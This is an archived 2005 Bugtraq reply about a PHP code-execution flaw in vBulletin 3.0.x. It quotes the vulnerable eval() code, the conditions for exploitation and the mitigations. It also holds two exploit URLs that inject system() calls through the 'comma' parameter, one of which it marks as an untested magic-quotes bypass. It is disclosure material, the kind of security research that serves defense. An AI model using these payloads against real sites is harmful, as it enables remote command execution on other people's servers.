[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: vbulletin 3.0.x PHP code execution

To: AL3NDALEEB <al3ndaleeb@xxxxxxx>, bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: vbulletin 3.0.x PHP code execution
From: pokley <pokleyzz@xxxxxxxxxxxxxxxxxxx>
Date: Tue, 15 Feb 2005 11:30:50 +0800

On 13 Feb 2005 17:16:35 -0000, AL3NDALEEB <al3ndaleeb@xxxxxxx> wrote:

The 4th condition is the most hard to find condition in php installation. There is a technique to by pass magic quote condition by supplying nested variable to $comma. Since I've no vbulletin source code to test with this technique is not confirmed in this vulnerability.

example:
        
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma={$func($comm)}&func=system&comm=id

It is never tested to real

Vulnerable Systems:
 ----------------
 vBulletin version 3.0 up to and including version 3.0.4
 Immune systems:
 ----------------
 vBulletin version 3.0.5
 vBulletin version 3.0.6
 Vulnerable code in forumdisplay.php :
 #############################################################
 if ($vboptions['showforumusers'])
 {
    .
    .
    .
    .
if ($bbuserinfo['userid']) { . . . . $comma = ', '; } . . . . while ($loggedin = $DB_site->fetch_array($forumusers)) { . . . eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln) $comma = ', '; . . } . . }

#############################################################

Conditions: ---------------- 1st condition : $vboptions['showforumusers'] == True , the admin must set showforumusers ON in vbulletin options. 2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest . 3rd condition : $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum. 4th condition : magic_quotes_gpc must be OFF SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in init.php by secret array GLOBALS[]=1 ;)))
 Solutions:
 ----------------
 * Disable showforumusers in vbulletin options .
 * add the next line before if ($vboptions['showforumusers'])
     $comma = '';
 Exploit:
 ----------------
example :
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."


--
Using Opera's revolutionary e-mail client: http://www.opera.com/m2/

References:
- vbulletin 3.0.x PHP code execution
  - From: AL3NDALEEB

Prev by Date: Re: eBay Account Phishing with eBay Redirect
Next by Date: MDKSA-2005:037 - Updated mailman packages fix directory traversal vulnerability
Previous by thread: vbulletin 3.0.x PHP code execution
Next by thread: Re: vbulletin 3.0.x PHP code execution
Index(es):
- Date
- Thread